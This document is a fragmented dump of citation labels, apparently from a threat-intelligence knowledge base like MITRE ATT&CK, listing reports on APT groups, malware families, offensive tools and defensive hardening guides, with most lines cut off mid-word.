to Unit 42 OutSteel SaintBot February 2022 ),(Citation: FBI FLASH APT39 September 2020),(Citation: Ensilo Darkgate 2018),
m Toolset May 2021),
,(Citation: Symantec WastedLocker June 2020),(Citation: VirusBulletin Kimsuky October 2019),(Citation: Mandiant APT41),(Citation: ATT S
tion: Kaspersky Lua),
S Software Integrity Assurance - TACACS)
eptember 2022),(Citation: FireEye Obfuscation June 2017),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: EST Kimsuky April 2019
tion: ESET Machete July 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: Trend Micro Tick November 2019),(Citation: Citi
jective-see windtail1 dec 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: sentinelone apt32 macOS backdoor 20
ation: ESET Grandoreiro April 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citation: TrendMicro Gamaredon April 2020),(Citation: S
),(Citation: PWC KeyBoys Feb 2017),(Citation: PWC WellMess July 2020),(Citation: GitHub QuasarRAT),(Citation: Check Point Warzone Feb
dnit USBStealer 2014),(Citation: ESET Sednit Part 2),(Citation: Microsoft Disable Autorun),(Citation: TechNet Removable Media Control)

rusBulletin Kimsuky October 2019),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Latrodectus APR 2024),(Citation: ANSSI

ndiant Pulse Secure Zero-Day April 2021),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Mandiant Cutting Edge January 20

C Critical Infrastructure February 2024),(Citation: Novetta-Axiom),

tation: Secureworks Gold Prelude Profile),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citation: Red Canary SocGhol
Mandiant Cutting Edge January 2024),(Citation: ORB APT31),(Citation: Lumen KVBotnet 2023),(Citation: Leonard TAG 2023),(Citation: Micr
ation: NSA Sandworm 2020),(Citation: Recorded Future Turla Infra 2020),(Citation: McAfee Night Dragon),(Citation: TrendMicro EarthLusc

tion: NSA NCSC Turla OilRig),

usca 2022),(Citation: PWC Yellow Liderc 2023),(Citation: SentinelOne WinterVivern 2023),(Citation: Recorded Future Turla Infra 2020),
Aqua Kinsing April 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Kubernetes Hardening Guide),(Citation: Docker Daemon Socket P
are),(Citation: Peirates GitHub),(Citation: Trend Micro TeamTNT),(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes RBAC),(C

sory November 2023),(Citation: Symantec WastedLocker June 2020),

),(Citation: AADInternals Documentation),
Fivehands June 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: Mandiant FIN12
alware),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Talos ZxShell Oct 2014),(Citation: FireEye SMOKEDHAM June 2021),(Citation:
ow Liderc 2023),(Citation: ESET Turla Lunar toolset May 2024),(Citation: ANSSI Sandworm January 2021),(Citation: Microsoft driver block r
ert for OSX Oct 2021),(Citation: Sofacy Komplex Trojan),(Citation: ESET DazzleSpy Jan 2022),(Citation: CheckPoint Dok),(Citation: Trend Mic
Lambert ATTCK Oct 2021),(Citation: ESET LoudMiner June 2019),(Citation: wardle evilquest parti),(Citation: Objective See Green Lambert fo
Citation: RotaJakiro 2021 netlab360 analysis),(Citation: Lunghi Iron Tiger Linux),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: Tre
ntec Naid June 2012),(Citation: Symantec Orangeworm April 2018),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Cylance Shell Cre
on: Symantec Elfin Mar 2019),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: ESET EvilNum July 2020),(Citation: Trend Micro Mud

,(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Secureworks Karagany July 201
eSpy Jan 2022),(Citation: Kandji Cuckoo April 2024),(Citation: GitHub LaZagne Dec 2018),(Citation: Securelist Calisto July 2018),(Citation: Ob
C2165),(Citation: objsee mac malware 2017),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Kaspersky Ferocious

GitHub PowerSploit May 2012),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye A
y Jan 2016),(Citation: ESET CaddyWiper March 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Microsoft WhisperGate Janu

tion: Cisco H1N1 Part 2),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Mythc Documentation),(Citation: University of Birmingham C2)
Blink February 2022),(Citation: Securelist ShadowPad Aug 2017),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Kaspersky ToddyCa
ar 2017),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Trend Micro Tick November 2019),(Citation: Kaspersky Sofacy),(Citation: K
Attacks September 2022),(Citation: Trend Micro Black Basta Spotlight September 2022),(Citation: SecureList SynAck Doppelgänging May 2

APT38 Oct 2018),(Citation: Unit42 Agrius 2023),(Citation: Ready.gov IT DRP)

(Citation: Fortinet Metamorfo Feb 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Casbaneiro Oct 2019),
e 2022),(Citation: Unit42 RDAT July 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Ensilo Darkgate 2018),(Citation: un
on: MSTIC NOBELIUM Mar 2021),(Citation: CISA WellMess July 2020),(Citation: ESET Sednit Part 3),(Citation: CrowdStrike StellarParticle Jan
Higaisa 2020),(Citation: Novetta Blockbuster Destructive Malware),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: US-CERT FALL
Micro Daserf Nov 2017),(Citation: Symantec W32.Duqu),(Citation: ESET Turla Lunar toolset May 2024),(Citation: FireEye APT29),(Citation:
adar INC Ransom January 2024),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Huntress INC Ransom Group August 2023),(Citation
022),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Kaspersky Sofacy),(Citation: Lumen Versa 2024),(Citation: Secureworks Karagan
Dragon),(Citation: NCC Group Chimera January 2021),(Citation: FireEye FIN6 April 2016),(Citation: Volexity SolarWinds),(Citation: FireEye K
ember 2018),(Citation: Rclone),(Citation: CISA Play Ransomware Advisory December 2023),(Citation: FireEye POSHSPY April 2017),(Citation
d Spider Advisory November 2023),(Citation: AADInternals),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Crowds
e 2017),(Citation: Cisco Blog Legacy Device Attacks),(Citation: Cisco Securing SNMP)
se 2017),(Citation: Cisco Blog Legacy Device Attacks),(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
e 2017),(Citation: Cisco Blog Legacy Device Attacks),(Citation: Cisco Securing SNMP)
SET EvasivePanda 2023),(Citation: CrowdStrike StellarParticle January 2022),(Citation: ESET ComRAT May 2020),(Citation: Leonard TAG 20
November 2023),(Citation: Microsoft Internal Solorigate Investigation Blog),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: MSTIC Octo T

d Actor September 2020),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: TrustedSec OOB Communications)
himera January 2021),(Citation: NCC Group APT15 Alive and Strong),(Citation: Secureworks GOLD SAHARA),(Citation: MSTIC DEV-0537 Ma
December 2018),(Citation: Kaspersky APT Trends Q1 2020),(Citation: Red Canary 2021 Threat Detection Report March 2021),(Citation: Syg
17),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NCC Group Chimera January 2021),(Citation: Forcepoint Monsoon),(Citatio
aspersky TajMahal April 2019),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: ESET Operation Groundbait),(Citation: ESET
ation: Talos Group123),(Citation: Logpoint Pikabot 2024),(Citation: wardle evilquest partii),(Citation: SentinelLabs Metador Technical Appe

ct Court Indictment GRU Unit 74455 October 2020),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: Ready.gov IT DRP)
lbanian Government Attacks September 2022),(Citation: Avertium Black Basta June 2022),(Citation: NCC Group Black Basta June 2022),(Cit
April 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 KerrD
zer Doki July 20),(Citation: Aqua Kinsing April 2020),(Citation: Intezer TeamTNT September 2020),(Citation: Cisco Talos Intelligence Group)
tone Sleet 2024),
20),(Citation: ESET EvasivePanda 2024),(Citation: Unit 42 BackConfig May 2020),
e 2020),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: PWC WellMess July 2020),

on: Microsoft Moonstone Sleet 2024),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: CISA Play Ransomware Advisory December 202
on INC Ransomware November 2023),(Citation: US-CERT HOPLIGHT Apr 2019),
tion: LOLBAS Esentutl),(Citation: Cary Esentutl),(Citation: MSTIC Octo Tempest Operations October 2023),

n: Symantec Elfin Mar 2019),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Cisco Ukraine Wipers January 2022),(Citation: M
Elfin Mar 2019),(Citation: FireEye APT37 Feb 2018),(Citation: Talos Group123),(Citation: ESET CaddyWiper March 2022),(Citation: Cisco Uk
H Mar 2021),(Citation: NCC Group Chimera January 2021),(Citation: GitHub PowerSploit May 2012),(Citation: Volexity SolarWinds),(Citatio
g),(Citation: GitHub Bloodhound),(Citation: Microsoft WMI Filters)
or Nov 2020),(Citation: Microsoft Ransomware as a Service),(Citation: ESET Hermetic Wizard March 2022),(Citation: apt41_mandiant),(Cit
ternals Documentation),(Citation: Microsoft 365 Defender Solorigate),(Citation: Secureworks IRON RITUAL Profile),(Citation: Azure AD Fed
ective-see windtail1 dec 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: SentinelOne SocGholish Infrastructure Nove
19),(Citation: McAfee Maze March 2020),(Citation: McAfee Night Dragon),(Citation: ESET Gelsemium June 2021),(Citation: Mandiant Suspe

ber 2018),(Citation: ESET Grandoreiro April 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: Trend Micro Conficker),(Citation: Sec
019),(Citation: unit42_gamaredon_dec2022),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Korean FSI TA505
an Indictments March 2018),(Citation: CIS Emotet Dec 2018),(Citation: IBM IcedID November 2017),(Citation: Cadet Blizzard emerges as no
ndictments March 2018),(Citation: CISA AA20-301A Kimsuky),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Microsoft Star Blizzard Augus
a January 2021),(Citation: Mandiant APT1),(Citation: Trend Micro Muddy Water March 2021),(Citation: FireEye APT35 2018),(Citation: Mc
banian Attacks September 2022),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: CISA Star Blizzard Advisory December 2023),(Ci
Citation: DFIR Phosphorus November 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Fortinet Emotet May 2017),(Citation
rity Advisory SVR TTP May 2021),(Citation: Secureworks Karagany July 2019),(Citation: PWC WellMess July 2020),(Citation: CISA AR21-126A
18),(Citation: Forcepoint Felismus Mar 2017),(Citation: Dell Sakula),(Citation: Fidelis Turbo),(Citation: Fidelis Hi-Zor),(Citation: Sofacy Kompl
RU Unit 74455 October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: ESET Dukes October 2019),(Citation: CERT-EU DDoS March 201

Aqua TeamTNT August 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Intezer Doki July 20),(Citation: Intezer TeamTNT September
ky Pay2Kitten December 2020),(Citation: Check Point Pay2Key November 2020),

ber 2023),(Citation: Mandiant APT1),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Kaspersky Lyceum October 2021),(Citation: ESET
ation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Google TAG Lazarus Jan 2021),(Citation: ESET Dukes October 2019

itation: Novetta-Axiom),(Citation: aptsim),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Github PowerShell Emp
ommands JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Microsoft Windows Defender Application Control),(Cit
ation: Trustwave Cherry Picker),(Citation: FBI FLASH APT39 September 2020),(Citation: Windows Commands JPCERT),(Citation: NSA MS Ap
tabases),(Citation: FOX-IT May 2016 Mofang),(Citation: Proofpoint TA505 October 2019),
msuky Sept 2013),
,(Citation: Talos Seduploader Oct 2017),(Citation: Medium KONNI Jan 2020),(Citation: Check Point Warzone Feb 2020),(Citation: NorthSec

,(Citation: Microsoft Deep Dive Solorigate January 2021),

kiro 2021 netlab360 analysis),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Anomali Linux Rabbit 2018),
ZE PRESIDENT December 2019),(Citation: Microsoft Holmium June 2020),(Citation: FireEye POSHSPY April 2017),(Citation: SentinelLabs Me
ttacks September 2022),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: SentinelOne NobleBaron June
e 2022),(Citation: Zscaler Pikabot 2023),(Citation: Elastic Pikabot 2024),(Citation: Microsoft Actinium February 2022),(Citation: Novetta Win
Citation: FireEye Poison Ivy),(Citation: Deep Instinct Black Basta August 2022),(Citation: Group IB GrimAgent July 2021),(Citation: CrowdStr
os Feb 2021),(Citation: Symantec Hydraq Jan 2010),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Talos PoetRAT April
3),(Citation: Rclone),(Citation: Volexity SolarWinds),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Tech

on: Bitdefender Agent Tesla April 2020),(Citation: Mandiant APT41),(Citation: FireEye APT37 Feb 2018),(Citation: ESET ForSSHe December
doreiro April 2020),(Citation: ESET ForSSHe December 2018),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: Trusteer Carberp Octob
eless GPO FEB 2009)

achete July 2019),(Citation: Kaspersky ProjectSauron Full Report),(Citation: ESET Sednit USBStealer 2014),(Citation: Securelist Machete Aug
s October 2021),(Citation: Mandiant APT41),(Citation: KISA Operation Muzabi),(Citation: BleepingComputer Molerats Dec 2020),(Citation:

himera January 2021),(Citation: ESET Nomadic Octopus 2018),(Citation: Rclone),(Citation: ESET ComRAT May 2020),(Citation: Google Cloud

phant Beetle Jan 2022),(Citation: Lumen Versa 2024),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Mandiant Pulse Secur
Talos Bitter Bangladesh May 2022),(Citation: Trend Micro Tick November 2019),(Citation: Talos Bisonal 10 Years March 2020),(Citation: Lum
017 VM Escape),(Citation: TechNet Moving Beyond EMET),(Citation: Bugcrowd Replay Attack),(Citation: Wikipedia Control Flow Integrity)
ation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET),(Citation: Wikipedia Control Flow Integrity)
May 2017),(Citation: Unit 42 Hildegard Malware),(Citation: Securelist Sofacy Feb 2018),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: U
ruary 2022),(Citation: ESET Trickbot Oct 2020),(Citation: MS17-010 March 2017),(Citation: Unit42 Emissary Panda May 2019),(Citation: Cle
Malware),(Citation: RSA2017 Detect and Respond Adair),(Citation: NCC Group Chimera January 2021),(Citation: Cybereason Soft Cell June
on: ESET Machete July 2019),(Citation: Mandiant APT1),(Citation: NCC Group Team9 June 2020),(Citation: Symantec Orangeworm April 201
),(Citation: Microsoft WhisperGate January 2022),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: PWC KeyBoys Feb 2017),(Citation:

worm January 2021),(Citation: Trend Micro TeamTNT),(Citation: CheckPoint Dok),(Citation: Anomali Rocke March 2019),(Citation: Lumen K
20),(Citation: Microsoft BlackCat Jun 2022),(Citation: Crowdstrike Indrik November 2018),(Citation: Sophos New Ryuk Attack October 2020
somware March 2024),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Microsoft Ransomware as a Service),(Citation:

021),(Citation: Unit 42 Phishery Aug 2018),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: US-CERT APT Energy Oct 2017),(Citation
ce),(Citation: Crowdstrike AWS User Federation Persistence)
r Guidance on Recent Nation-State Cyber Attacks),(Citation: AADInternals Documentation),(Citation: FireEye ADFS),(Citation: Microsoft So

Court Indictment GRU Unit 74455 October 2020),(Citation: Google Iran Threats October 2021),
),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Mandiant FIN13 Aug
: NCC Group Chimera January 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Cr
Threats October 2021),(Citation: Microsoft Moonstone Sleet 2024),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: TrendMicro Pikabot 20
RU Unit 74455 October 2020),(Citation: DOJ Iran Indictments March 2018),
38A PRC Critical Infrastructure February 2024),(Citation: Mandiant_UNC2165),

t 74455 October 2020),(Citation: AADInternals Documentation),

Threats October 2021),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),

tion: Mandiant FIN13 Aug 2022),

tation: Microsoft Moonstone Sleet 2024),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: CISA AA24-038A PRC Critical Infrastructur
nt GRU Unit 74455 October 2020),(Citation: Gigamon Berserk Bear October 2021),

ation: MSTIC DEV-0537 Mar 2022),(Citation: SecureWorks August 2019),(Citation: ClearSky Siamesekitten August 2021),(Citation: CISA AA
b 2016),(Citation: ESET ComRAT May 2020),(Citation: Google Cloud APT41 2024),(Citation: Github PowerShell Empire),(Citation: GitHub Bl

shlayer to zshlayer),(Citation: Check Point Warzone Feb 2020),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: Shlayer jamf gatek
Operations October 2023),(Citation: Microsoft Manage Mail Flow Rules 2023),(Citation: Microsoft Get-InboxRule)
er Exclusions)
ay 2020),(Citation: Kaspersky Equation QA),(Citation: Kaspersky Regin),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware M
e July 2019),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Securelist Calisto July 2018),(Citation: Sygnia Elephant Beetle Jan 2022),(Citatio
: FireEye SMOKEDHAM June 2021),
cy 06-2018),(Citation: FireEye APT32 May 2017),(Citation: Malwarebytes AvosLocker Jul 2021),(Citation: ESET Nomadic Octopus 2018),(Cit
e January 2022),(Citation: Shlayer jamf gatekeeper bypass 2021),
n: Volexity PowerDuke November 2016),(Citation: Mandiant APT41),(Citation: Sentinel Labs WastedLocker July 2020),(Citation: Cisco DNSM
November 2020),
rika noerenberg 2020),(Citation: OSX Keydnap malware),(Citation: Apple App Security Overview)
ber 2020),(Citation: Sophos Ragnar May 2020),

arkgate 2023),(Citation: NCSC et al APT29 2024),

andiant APT41),(Citation: CyberBit Dtrack),(Citation: FOX-IT May 2016 Mofang),(Citation: Ensilo Darkgate 2018),(Citation: Symantec Dagge

ortilla Aug 2022),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Windows Commands JPCERT)
12),(Citation: ESET EvilNum July 2020),(Citation: Google Cloud APT41 2024),(Citation: Securelist Brazilian Banking Malware July 2020),(Citati
n: Sygnia Elephant Beetle Jan 2022),(Citation: Cyble Egregor Oct 2020),(Citation: Deep Instinct Black Basta August 2022),(Citation: Trend M
ation: ESET Ebury Oct 2017),(Citation: Anomali Rocke March 2019),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: Intezer HiddenW

inFisher exposed ),
pire),(Citation: PowerSploit Documentation),(Citation: Ensilo Darkgate 2018),(Citation: Microsoft CreateProcess),(Citation: Microsoft Applic
pire),(Citation: PowerSploit Documentation),(Citation: Microsoft CreateProcess),(Citation: Microsoft Application Lockdown),(Citation: Wind
pire),(Citation: PowerSploit Documentation),(Citation: Microsoft CreateProcess),(Citation: Microsoft Application Lockdown),(Citation: Wind
ulnerable),(Citation: Powersploit)

iere, Liam O Murchu, Eric Chien February 2011),(Citation: Chromium HSTS)

on: Wevtutil Microsoft Documentation),(Citation: DFIR Phosphorus November 2021),(Citation: SecureWorks BRONZE UNION June 2017),(C

ebruary 2022),(Citation: ESET Grandoreiro April 2020),(Citation: Cisco H1N1 Part 2),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Ci
uary 2022),(Citation: Fortinet Agent Tesla June 2017),(Citation: Trend Micro Tick November 2019),(Citation: CrowdStrike AQUATIC PANDA

239A BeagleBoyz August 2020),(Citation: Sandfly BPFDoor 2022),(Citation: Securing bash history)
May 2021),(Citation: ESET Ebury Feb 2014),(Citation: ESET Ebury May 2024),(Citation: Trend Micro Waterbear December 2019),(Citation:
sta May 2022),(Citation: Costa AvosLocker May 2022),(Citation: BleepingComputer REvil 2021),(Citation: Trend Micro AvosLocker Apr 2022

ation: CISA Scattered Spider Advisory November 2023),(Citation: The Hacker News Lazarus Aug 2022),(Citation: apt41_mandiant),(Citation
ner Registry)
Prevailion EvilNum May 2020),(Citation: Google Cloud APT41 2024),(Citation: McAfee Maze March 2020),(Citation: Microsoft Deep Dive S
itation: Mandiant Pulse Secure Update May 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Trend Micro TeamTNT),(Citation: Securelis
),(Citation: Anomali Rocke March 2019),(Citation: objsee mac malware 2017),
s),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Microsoft Manage Mail Flow Rules 2023)
ft Deep Dive Solorigate January 2021),
(Citation: ESET RTM Feb 2017),(Citation: Microsoft RaspberryRobin 2022),(Citation: Group IB GrimAgent July 2021),(Citation: NCC Group Te
nging May 2018),(Citation: Symantec WastedLocker June 2020),(Citation: ESEST Black Energy Jan 2016),(Citation: NCC Group Chimera Janu
tation: CISA Iran Albanian Attacks September 2022),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: ESET Grandoreiro April 2020)
T41 2024),(Citation: Technet Net Use),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: ESET InvisiMole June 2018),

Blink February 2022),(Citation: FireEye APT32 May 2017),(Citation: NCC Group Chimera January 2021),(Citation: CrowdStrike Putter Panda
n: trendmicro_redcurl),(Citation: Evi1cg Forfiles Nov 2017),(Citation: Cofense RevengeRAT Feb 2019),
Gate January 2022),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Unit 42 KerrDown February 2019),(Citation: PWC K
ro Black Basta Spotlight September 2022),(Citation: Trend Micro Black Basta May 2022),(Citation: Symantec WastedLocker June 2020),(Cit
020),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Korean FSI TA505 2020),(Citation: Cybereason Chaes Nov 20
18),(Citation: Prevx Carberp March 2011),(Citation: GDATA Zeus Panda June 2017),(Citation: FinFisher Citation),(Citation: Microsoft PLATIN
FIN4 Dec 2014),(Citation: Kandji Cuckoo April 2024),(Citation: FireEye Metamorfo Apr 2018),(Citation: Segurança Informática URSA Sophis
,(Citation: EST Kimsuky April 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Fortinet Agent Tesla June 2017),(Citation: Talos Agent
e January 2024),(Citation: Triton-EENews-2017),(Citation: SentinelOne WinterVivern 2023),(Citation: Volexity Ivanti Zero-Day Exploitation
at June 2022),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Mandiant ROA
T Trickbot Oct 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Github_SILENTTRINITY),(Citation: Elastic Latrodectus May 2024)
2019),(Citation: McAfee APT28 DDE1 Nov 2017),(Citation: FireEye MuddyWater Mar 2018),(Citation: Cisco Talos Bitter Bangladesh May 20
tation: SecureWorks August 2019),(Citation: ESET Gamaredon June 2020),(Citation: CISA AA21-200A APT40 July 2021),
-Sandworm-Ukraine-2022),(Citation: NCC Group Chimera January 2021),(Citation: LOLBAS Esentutl),(Citation: TechNet Copy),(Citation: Mic
n June 2023),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Google Cloud APT41 2024),(Citation: CISA GRU29155 2024),(C
2020),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation:

USTANG PANDA October 2019),(Citation: ClearSky Siamesekitten August 2021),(Citation: Cybereason Bazar July 2020),(Citation: Trellix Dark
ust 2018),(Citation: McAfee Netwire Mar 2015),(Citation: ESET Gelsemium June 2021),(Citation: Kaspersky Regin),(Citation: Securelist ScarC
: aptsim),(Citation: Kaspersky Flame Functionality),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: US-CERT TA18-074A),(C
22),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Trend Micro Black Basta October 2022),(Citation: Secureworks BRO
e-2022),(Citation: Symantec Orangeworm April 2018),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Cybereason Bazar July 2
Sowbug Nov 2017),(Citation: ESET Grandoreiro April 2020),(Citation: netlab360 rotajakiro vs oceanlotus),(Citation: Sygnia Elephant Beetle
019),(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade),(Citation: FireEye APT10 Sept 2018),(Citation: Qualys LolZarus),(Citation: T
Micro BlackTech June 2017),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Trend Micro Tick November 2019),(Citation: Scarlet

Citation: Mandiant FIN13 Aug 2022),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: store_pwd_rev_enc),(Citation: Mandian

chNet Least Privilege),(Citation: Microsoft Securing Privileged Access),(Citation: Microsoft LSA),(Citation: TechNet Credential Theft)
(Citation: Mandiant Azure AD Backdoors),(Citation: MagicWeb)
iant Pulse Secure Zero-Day April 2021),(Citation: Mandiant Cloudy Logs 2023)
Day April 2021),(Citation: Cisco IOS Software Integrity Assurance - TACACS)

Access),(Citation: TechNet Credential Theft),(Citation: store_pwd_rev_enc)

ampaign December 2022),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Mandiant M-Trends 2020)

force Threat Detection 2024),(Citation: Azure Subscription Policies)

nging May 2018),(Citation: ESET Grandoreiro April 2020),(Citation: Symantec Naid June 2012),(Citation: Deep Instinct Black Basta August 20
nt),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: N
nt),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - TACACS),(Citation: N
,(Citation: Cisco IOS Software Integrity Assurance - Credentials Management),(Citation: Cisco IOS Software Integrity Assurance - Secure Bo
p Chimera January 2021),(Citation: KISA Operation Muzabi),(Citation: Alienvault Sykipot DOD Smart Cards),(Citation: MSTIC DEV-0537 Mar
SC et al APT29 2024),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Suspec
19),(Citation: Unit 42 Valak July 2020),(Citation: Latrodectus APR 2024),(Citation: ESET Turla Lunar toolset May 2024),(Citation: FireEye APT
Doppelgänging May 2018),(Citation: ESET Grandoreiro April 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Unit42 Emissary
isco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Software Integrity Assurance - TACACS)
- AAA),(Citation: Cisco IOS Software Integrity Assurance - TACACS)
8),(Citation: Unit 42 Lucifer June 2020),(Citation: CERT-EU DDoS March 2017)

2022),(Citation: Unit42 Emissary Panda May 2019),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: FRP GitHub),(Citation: ANSSI San
cker Jul 2021),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Symantec Sowbug Nov 2017),(Citation: Trend Micro DRBControl Feb
cTools nbtscan June 2003),(Citation: ESET Telebots Dec 2016),(Citation: Lumen Versa 2024),(Citation: MSTIC FoggyWeb September 2021),(
017),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: netlab360 rotajakiro vs oceanlotus),(Citation: Fidelis Turbo),(Citation: Lumen
ebruary 2022),(Citation: Trustwave GoldenSpy June 2020),(Citation: Symantec Elfin Mar 2019),(Citation: netlab360 rotajakiro vs oceanlotus
19),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye Periscope March 2018),(Citation: BitDefender Chafer May 2020),(Citation: F-

18),(Citation: GitHub LaZagne Dec 2018),(Citation: Unit42 OilRig Playbook 2023),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: FireEy
Public Tools),(Citation: TrendMicro EarthLusca 2022),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Cobalt Strike Manual 4.
n: CME Github September 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: CrowdStrike IceApple May 2022),(Cit
phant Beetle Jan 2022),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: F-Secure CozyDuke),(Citation: GitHub LaZagne
Chimera January 2021),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: LOLBAS Esentutl),(Citation: Sygnia Elephant
,(Citation: MimiPenguin GitHub May 2017),(Citation: Mandiant Pulse Secure Zero-Day April 2021),
ation: Mandiant APT1),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: CME Github September 2018),(Citation: FireEye KEGTAP SINGL
Doppelgänging May 2018),(Citation: Kaspersky Sofacy),(Citation: McAfee Maze March 2020),(Citation: Cylance Shell Crew Feb 2017),(Citati
Trend Micro Qakbot May 2020),(Citation: Emissary Trojan Feb 2016),(Citation: Zscaler Higaisa 2020),(Citation: ESET OceanLotus Mar 2019
17),(Citation: Picus Emotet Dec 2018),(Citation: Talos Emotet Jan 2019),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation:
tember 2021),(Citation: Kaspersky ToddyCat June 2022),(Citation: Anomali Rocke March 2019),(Citation: ESET Gamaredon June 2020),(Cita
ul 2021),(Citation: Latrodectus APR 2024),(Citation: Sekoia Raccoon2 2022),(Citation: Kaspersky ToddyCat June 2022),(Citation: Microsoft A
Microsoft Moonstone Sleet 2024),(Citation: Gigamon BADHATCH Jul 2019),(Citation: Google Cloud APT41 2024),(Citation: Microsoft Uniden
